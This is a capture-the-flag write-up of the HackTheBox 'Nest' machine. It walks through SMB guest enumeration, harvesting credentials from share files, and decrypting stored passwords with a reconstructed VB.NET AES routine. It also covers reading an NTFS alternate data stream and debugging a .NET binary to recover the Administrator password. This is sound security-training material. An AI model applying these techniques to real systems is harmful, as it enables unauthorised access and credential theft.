Nest Writeup (HackTheBox)

2020, May 20    

Enumeration

Starting off with an nmap scan, we have two ports to work with: SMB on 445 and some other service running on port 4386.

root@kali:~/Documents/HackTheBox/Nest# nmap -Pn -sS -p1-10000 -T4 -sV 10.10.10.178 -v | tee nmap.txt
...
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
...

Since I knew SMB would be running on 445, I decided to quickly check out the service on 4386.

root@kali:~/Documents/HackTheBox/Nest# nc -nv 10.10.10.178 4386
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.10.178:4386.

HQK Reporting Service V1.2

>HELP

A quick search for HQK Reporting Service 1.2 didn’t yield any information. Furthermore, typing anything would just cause the connection to hang and I wouldn’t receive any response. Before moving on however, I decided to try and connect using telnet. This time I was receiving responses to my input, so I poked around a bit.

root@kali:~/Documents/HackTheBox/Nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

>help setdir

SETDIR <Directory>
Selects a new directory where query files can be run from. Use the LIST command to view available directory names (marked with [DIR]) that can be used with this command. The special characters ".." can be used to go back upto the previous directory.

Examples:
SETDIR MY QUERIES       Changes to the directory named "MY QUERIES"
SETDIR ..               Changes to the parent directory of the current directory

>help list

LIST
Lists the available queries in the current directory, along with an ID number for each query. This number can be used with the RUNQUERY or SHOWQUERY commands.
To change the current directory use the SETDIR command

>help debug

DEBUG <Password>
Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed

Examples: 
DEBUG MyPassw0rd     Attempts to enable debug mode by using the
                     password "MyPassw0rd"

So it looks like we can use this tool to at least move around various directories (using SETDIR) and list the contents using LIST. But before going down this path, I decided to give unauthenticated SMB access a go.

root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u ''
[+] IP: 10.10.10.178:445        Name: 10.10.10.178
root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u 'Guest'
[+] IP: 10.10.10.178:445    Name: 10.10.10.178                                      
        Disk                                          Permissions     Comment
        ----                                          -----------     -------
        ADMIN$                                        NO ACCESS       Remote Admin
        C$                                            NO ACCESS       Default share
        Data                                          READ ONLY
        IPC$                                          NO ACCESS       Remote IPC
        Secure$                                       NO ACCESS
        Users                                         READ ONLY

While a NULL session did not work, a Guest session did allow me to list available shares. However (and this part still confuses me), when I went to log in with smbclient using the Guest username and no password, I couldn’t log in (despite having READ ONLY access). However, when I just hit Enter when asked for a password, I could log in fine. On a similar note, supplying a non-existent username with no password worked for both smbmap and smbclient.

# Guest with no password
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U Guest -N
session setup failed: NT_STATUS_LOGON_FAILURE

# Guest with blank string password - same as no password?
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U Guest ''
session setup failed: NT_STATUS_LOGON_FAILURE

# Guest with <ENTER> as password works fine
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U Guest
Enter WORKGROUP\Guest's password: 
Try "help" to get a list of possible commands.
smb: \>

# smbmap with nonexistent user works fine (same as Guest)
root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u 'fake'
[+] Guest session       IP: 10.10.10.178:445    Name: 10.10.10.178                        
        Disk                                          Permissions     Comment
        ----                                          -----------     -------
        ADMIN$                                        NO ACCESS       Remote Admin
        C$                                            NO ACCESS       Default share
        Data                                          READ ONLY
        IPC$                                          NO ACCESS       Remote IPC
        Secure$                                       NO ACCESS
        Users                                         READ ONLY

# smbclient with nonexistent user and no password works fine - why?
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U fake -N
Try "help" to get a list of possible commands.
smb: \> 

My theory here is that smbclient was actually trying to login as the built-in Guest user, which might be disabled, whereas smbmap was just logging in as a random user? Perhaps something to do with how Anonymous, Guest and Everyone are three different entities in Windows when sharing files? I’d be very interested to know the reasoning behind this, but from now on I’ll just include the following 3 items on my SMB enumeration checklist:

1. NULL sessions (no username, no password)
2. Guest sessions (Guest username / no password and Guest username / random password)
3. "Random" sessions (random username / no password and random username / random password)

Once finally able to log in, I started with the Users share. No access to anything, but at least a list of users who have logged in to the machine.

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'fake' -N
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
NT_STATUS_ACCESS_DENIED listing \C.Smith\*

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

Moving on to the Data share, we have access to a couple of items.

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Data -U 'fake' -N
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  IT                                  D        0  Wed Aug  7 18:58:07 2019
  Production                          D        0  Mon Aug  5 17:53:38 2019
  Reports                             D        0  Mon Aug  5 17:53:44 2019
  Shared                              D        0  Wed Aug  7 15:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
  Maintenance                         D        0  Wed Aug  7 15:07:32 2019
  Templates                           D        0  Wed Aug  7 15:08:07 2019

\Shared\Maintenance
  Maintenance Alerts.txt              A       48  Mon Aug  5 19:01:44 2019

\Shared\Templates
  HR                                  D        0  Wed Aug  7 15:08:01 2019
  Marketing                           D        0  Wed Aug  7 15:08:06 2019

\Shared\Templates\HR
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019
smb: \> get "Shared\Maintenance\Maintenance Alerts.txt" "Maintenance Alerts.txt"
...
smb: \> get "Shared\Templates\HR\Welcome Email.txt" "Welcome Email.txt"
...

And let’s see what’s inside! While Maintenance Alerts.txt wasn’t useful, the other file was indeed very helpful.

root@kali:~/Documents/HackTheBox/Nest# cat Welcome\ Email.txt 
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR

Credentials for a user we know exists on the host! I proceeded to re-enumerate with my new login of TempUser / welcome2019.

With this login, not only do we still have access to the previous shares, but now also the new Secure$ share.

root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u 'TempUser' -p 'welcome2019'
[+] IP: 10.10.10.178:445    Name: 10.10.10.178                                      
        Disk                                          Permissions     Comment
        ----                                          -----------     -------
        ADMIN$                                        NO ACCESS       Remote Admin
        C$                                            NO ACCESS       Default share
        Data                                          READ ONLY
        IPC$                                          NO ACCESS       Remote IPC
        Secure$                                       READ ONLY
        Users                                         READ ONLY

First, let’s see what’s in the Users share in our TempUser directory.

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'TempUser' 'welcome2019'
Try "help" to get a list of possible commands.
smb: \> dir TempUser/
  .                                   D        0  Wed Aug  7 18:55:56 2019
  ..                                  D        0  Wed Aug  7 18:55:56 2019
  New Text Document.txt               A        0  Wed Aug  7 18:55:56 2019

Just an empty text file. Now let’s try the Data share again.

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Data -U TempUser 'welcome2019'
smb: \> recurse
smb: \> dir
  IT                                  D        0  Wed Aug  7 18:58:07 2019
  Production                          D        0  Mon Aug  5 17:53:38 2019
  Reports                             D        0  Mon Aug  5 17:53:44 2019
  Shared                              D        0  Wed Aug  7 15:07:51 2019

\IT
  Archive                             D        0  Mon Aug  5 18:33:58 2019
  Configs                             D        0  Wed Aug  7 18:59:34 2019
  Installs                            D        0  Wed Aug  7 18:08:30 2019
  Reports                             D        0  Sat Jan 25 19:09:13 2020
  Tools                               D        0  Mon Aug  5 18:33:43 2019

\Shared
  Maintenance                         D        0  Wed Aug  7 15:07:32 2019
  Templates                           D        0  Wed Aug  7 15:08:07 2019

\IT\Configs
  Adobe                               D        0  Wed Aug  7 15:20:09 2019
  Atlas                               D        0  Tue Aug  6 07:16:18 2019
  DLink                               D        0  Tue Aug  6 09:25:27 2019
  Microsoft                           D        0  Wed Aug  7 15:23:26 2019
  NotepadPlusPlus                     D        0  Wed Aug  7 15:31:37 2019
  RU Scanner                          D        0  Wed Aug  7 16:01:13 2019
  Server Manager                      D        0  Tue Aug  6 09:25:19 2019

\Shared\Maintenance
  Maintenance Alerts.txt              A       48  Mon Aug  5 19:01:44 2019

\Shared\Templates
  HR                                  D        0  Wed Aug  7 15:08:01 2019
  Marketing                           D        0  Wed Aug  7 15:08:06 2019

\IT\Configs\Adobe
  editing.xml                        AH      246  Sat Aug  3 08:58:42 2019
  Options.txt                         A        0  Mon Oct 10 17:11:14 2011
  projects.xml                        A      258  Tue Jan  8 11:30:52 2013
  settings.xml                        A     1274  Wed Aug  7 15:19:12 2019

\IT\Configs\Atlas
  Temp.XML                            A     1369  Wed Jun 11 03:38:22 2003

\IT\Configs\Microsoft
  Options.xml                         A     4598  Sat Mar  3 14:24:24 2012

\IT\Configs\NotepadPlusPlus
  config.xml                          A     6451  Wed Aug  7 19:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 15:30:27 2019

\IT\Configs\RU Scanner
  RU_config.xml                       A      270  Thu Aug  8 15:49:37 2019

\Shared\Templates\HR
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019

Rather than get all these files manually, I opted to use this new tool I had recently learned about called smbget. What I like about this tool is that it preserves the directory structure when recursively fetching files.

root@kali:~/Documents/HackTheBox/Nest# smbget -U 'TempUser'%'welcome2019' -R smb://10.10.10.178/Data/

I then started to go through the various TXT and XML files I had just downloaded. These were the two that stood out to me as being more useful than the others. First, a Notepad++ configuration file that listed paths to other files that were once open. In particular, note that the path Secure$\IT\Carl was valid when this file was created.

root@kali:~/Documents/HackTheBox/Nest# cat IT/Configs/NotepadPlusPlus/config.xml 
<?xml version="1.0" encoding="Windows-1252" ?>
...
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
...

Secondly, a configuration file for something called RU Scanner that contained some kind of password for user C.Smith (potentially linked to the Windows user C.Smith).

root@kali:~/Documents/HackTheBox/Nest# cat IT/Configs/RU\ Scanner/RU_config.xml 
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>

While this looks like a base64 encoded password, I tried out the password as-is, just in case. Unsurprisingly however, it failed.

root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u 'c.smith' -p 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE='
[!] Authentication error on 10.10.10.178

Decoding the base64 resulted in a bunch of garbage characters, indicating to me that the underlying text was encrypted in some way.

root@kali:~/Documents/HackTheBox/Nest# echo 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=' | base64 -d
}13��=X�J�BA�X*�Wc�f���?βc

Remember that Notepad++ configuration file that told us the path Secure$\IT\Carl exists? While I didn’t think I could do anything with this, rather than assume I decided to actually try and specifically list the IT\Carl directory. To my surprise, it worked!

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Secure$ -U 'TempUser' 'welcome2019'
Try "help" to get a list of possible commands.
smb: \> dir
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  IT                                  D        0  Thu Aug  8 06:59:25 2019

                10485247 blocks of size 4096. 6543116 blocks available
smb: \> dir IT/
NT_STATUS_ACCESS_DENIED listing \IT\
smb: \> dir IT/Carl/
  Docs                                D        0  Wed Aug  7 15:44:00 2019
  Reports                             D        0  Tue Aug  6 09:45:40 2019
  VB Projects                         D        0  Tue Aug  6 10:41:55 2019

Once again, I used smbget to download the files from this folder and mimic the directory structure. Taking a closer look at what I had collected, I found what looked like source code for the RU Scanner application - the same application that had the config file with the encrypted password. So, it’s possible that the source code could tell me how the password was encrypted, allowing me to reverse the process and get a plaintext password.

root@kali:~/Documents/HackTheBox/Nest/Carl# smbget -U TempUser -R -D smb://10.10.10.178/Secure$/IT/Carl
...
root@kali:~/Documents/HackTheBox/Nest/Carl/VB Projects# ls -alR
...
./WIP/RU/RUScanner:
total 52
drwxr-xr-x 5 root root 4096 May 19 21:27  .
drwxr-xr-x 3 root root 4096 May 19 21:27  ..
drwxr-xr-x 4 root root 4096 May 19 21:27  bin
-rwxr-xr-x 1 root root  772 May 19 21:27  ConfigFile.vb
-rwxr-xr-x 1 root root  279 May 19 21:27  Module1.vb
drwxr-xr-x 2 root root 4096 May 19 21:27 'My Project'
drwxr-xr-x 3 root root 4096 May 19 21:27  obj
-rwxr-xr-x 1 root root 4828 May 19 21:27 'RU Scanner.vbproj'
-rwxr-xr-x 1 root root  143 May 19 21:27 'RU Scanner.vbproj.user'
-rwxr-xr-x 1 root root  133 May 19 21:27  SsoIntegration.vb
-rwxr-xr-x 1 root root 4888 May 19 21:27  Utils.vb
...

After looking through Module1.vb and Utils.vb, I was able to find the password decryption code and put together my own VB.NET code snippet to decrypt the base64 string I had. I used .NET Fiddle to run this code online.

Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Module Module1

    ' Mirrors the decryption routine found in the RU Scanner source: PBKDF2
    ' (Rfc2898DeriveBytes) turns the passphrase and salt into an AES key, then
    ' the base64 ciphertext is decrypted with AES-CBC using the given IV.
    Public Function Decrypt(ByVal cipherText As String, _
                            ByVal passPhrase As String, _
                            ByVal saltValue As String, _
                            ByVal passwordIterations As Integer, _
                            ByVal initVector As String, _
                            ByVal keySize As Integer) _
                            As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        ' PBKDF2-HMAC-SHA1 key derivation from the passphrase and salt
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        ' keySize is in bits; GetBytes wants a byte count
        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        ' The plaintext can never be longer than the ciphertext
        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        ' Read strips the PKCS7 padding and returns the real plaintext length
        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

    Public Sub Main()
        ' Ciphertext from RU_config.xml; passphrase, salt, iterations, IV and
        ' key size as used by the RU Scanner source
        Console.WriteLine(Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256))
    End Sub
End Module

This gave me the following output: xRxRxPANCAK3SxRxRx, which I immediately tried with the C.Smith user against SMB.

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'C.Smith' 'xRxRxPANCAK3SxRxRx'
Try "help" to get a list of possible commands.
smb: \> cd C.Smith\
smb: \C.Smith\> recurse
smb: \C.Smith\> dir
  HQK Reporting                       D        0  Thu Aug  8 19:06:17 2019
  user.txt                            A       32  Thu Aug  8 19:05:24 2019

\C.Smith\HQK Reporting
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  HqkLdap.exe                         A    17408  Wed Aug  7 19:41:16 2019

I grabbed everything once again using smbget, submitted the user flag, and then went on to check if our new user had access to other useful folders we didn’t have before. Not finding anything good, I proceeded with these newly collected files.

Based on the HQK_Config_Backup.xml, this folder had something to do with the service listening on port 4386.

root@kali:~/Documents/HackTheBox/Nest/CSmith_User/HQK Reporting# cat HQK_Config_Backup.xml 
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>4386</Port>
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>

Remember there was also a DEBUG option which took a password - which is probably what the Debug Mode Password.txt file contains. To my surprise though, the file was completely empty. After puzzling around with what I could possibly do with a 0 byte file, and visiting other shares to make sure I didn’t miss anything, I remembered something I had read about Alternate Data Streams.

Alternate Data Streams?

Basically, the NTFS file system is able to store multiple streams of data for a given file. The main stream that everyone is familiar with is the unnamed stream, which simply contains the contents of the file. However, any given file could have any number of named streams, all of which can contain different information. While there are many ways to access these alternate streams (e.g. PowerShell), I had to do so using only SMB access. The smbclient tool is able to display all available streams using the allinfo command, as seen below. The stream contents can then be retrieved using the get command by appending :STREAM_NAME to the end of the file name.

Indeed, the file did have an alternate Password stream, which I was able to retrieve.

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'C.Smith' 'xRxRxPANCAK3SxRxRx'
Try "help" to get a list of possible commands.
smb: \> cd "C.Smith\HQK Reporting\"
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt" 
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password" "dbg_alt_stream.txt"
root@kali:~/Documents/HackTheBox/Nest/CSmith_User/HQK Reporting$ cat dbg_alt_stream.txt 
WBQ201953D8w 

Armed with what looks like our debug mode password, let’s go try it out.

root@kali:~/Documents/HackTheBox/Nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
>service

--- HQK REPORTING SERVER INFO ---

Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES
>session

--- Session Information ---

Session ID: 828e991b-3c83-496c-a882-dacf8b9f431f
Debug: True
Started At: 5/20/2020 3:48:50 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.14.252:53992
Current Query Directory: C:\Program Files\HQK\ALL QUERIES
>help showquery


SHOWQUERY <Query_ID>
Shows the contents of the specified database query. Use the LIST command to view available queries, making note of the ID number next to the query you want to view, then use the SHOWQUERY command with that ID number.

Examples:
SHOWQUERY 5       Shows the query with ID number 5

The DEBUG command has unlocked two diagnostic style commands for us, but more importantly the SHOWQUERY command. In combination with SETDIR and LIST, we should be able to show the contents of any file we can access.

>setdir ..
Current directory set to HQK

>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>setdir LDAP
Current directory set to LDAP

>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Using the built-in commands, we now have what appears to be another encrypted password for the Administrator user account (looking very similar to the RU Scanner one above). Just to be sure, I tried logging in with this string, but it did not work (as expected).

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'Administrator' 'yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4='
session setup failed: NT_STATUS_LOGON_FAILURE

Once again, base64 decoding yielded what looked like an encrypted string.

root@kali:~/Documents/HackTheBox/Nest# echo "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=" | base64 -d
�!*�K�@�^.��A�j���)׆�H�U�

Based on the directory that this information was found in (C:\Program Files\HQK\LDAP), I thought maybe this had something to do with the HqkLdap.exe file we found in C.Smith’s user folder. Using the file command, I saw that said binary was a .NET executable.

root@kali:~/Documents/HackTheBox/Nest/CSmith_User/HQK Reporting/AD Integration Module# file HqkLdap.exe 
HqkLdap.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

Thinking that this binary may give a clue as to how the password is encrypted, I downloaded dnSpy on my Windows VM and took a closer look.

[Screenshot: main code]

It looks like this program does the following:

1. Checks that there is 1 command line argument.
2. Checks if HqkDbImport.exe exists.
3. Reads the file specified on the command line argument (presumably the ldap.conf file we found).
4. Creates an object with the decrypted password.

Knowing this, I could simply create my own ldap.conf file, pass it as an argument, and set a breakpoint that would pause the program’s execution and allow me to view the decrypted password in the object’s memory. I also needed to create a fake HqkDbImport.exe file, just so that the existence check would pass.

With all this done, my working directory looked like this:

[Screenshot: working directory]

I then set a breakpoint in the code (indicated by the red dot) just after the password decryption occurred.

[Screenshot: breakpoint]

Finally, I ran the program in debug mode, passing in my ldap.conf file as an argument.

[Screenshot: debugging]

After hitting OK, the program ran and then paused, showing me all the local variables. Scrolling around a bit, I found the password.

[Screenshot: results]

With the new credentials of Administrator / XtH4nkS4Pl4y1nGX I proceeded to log in to the Users share. Here, I was greeted with a shortcut to the flag, rather than the actual flag itself. I downloaded the file and used strings to see where the shortcut was pointing to.

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'Administrator' 'XtH4nkS4Pl4y1nGX'
Try "help" to get a list of possible commands.
smb: \> dir Administrator\
  .                                   D        0  Fri Aug  9 11:08:23 2019
  ..                                  D        0  Fri Aug  9 11:08:23 2019
  flag.txt - Shortcut.lnk             A     2384  Fri Aug  9 11:10:15 2019
smb: \> get "Administrator\flag.txt - Shortcut.lnk"
root@kali:~/Documents/HackTheBox/Nest# strings flag.txt\ -\ Shortcut.lnk 
...
\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt
...

As I suspected, I had to connect to the C$ share and browse the file system from there.

root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\C$ -U 'Administrator' 'XtH4nkS4Pl4y1nGX'
Try "help" to get a list of possible commands.
smb: \> dir Users\Administrator\Desktop\
  desktop.ini                       AHS      282  Sat Jan 25 17:02:44 2020
  root.txt                            A       32  Mon Aug  5 18:27:26 2019
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> dir
  desktop.ini                       AHS      282  Sat Jan 25 17:02:44 2020
  root.txt                            A       32  Mon Aug  5 18:27:26 2019
smb: \Users\Administrator\Desktop\> get root.txt

And with that, the root flag is captured! Best part? There’s no cleanup on the remote host for us to do.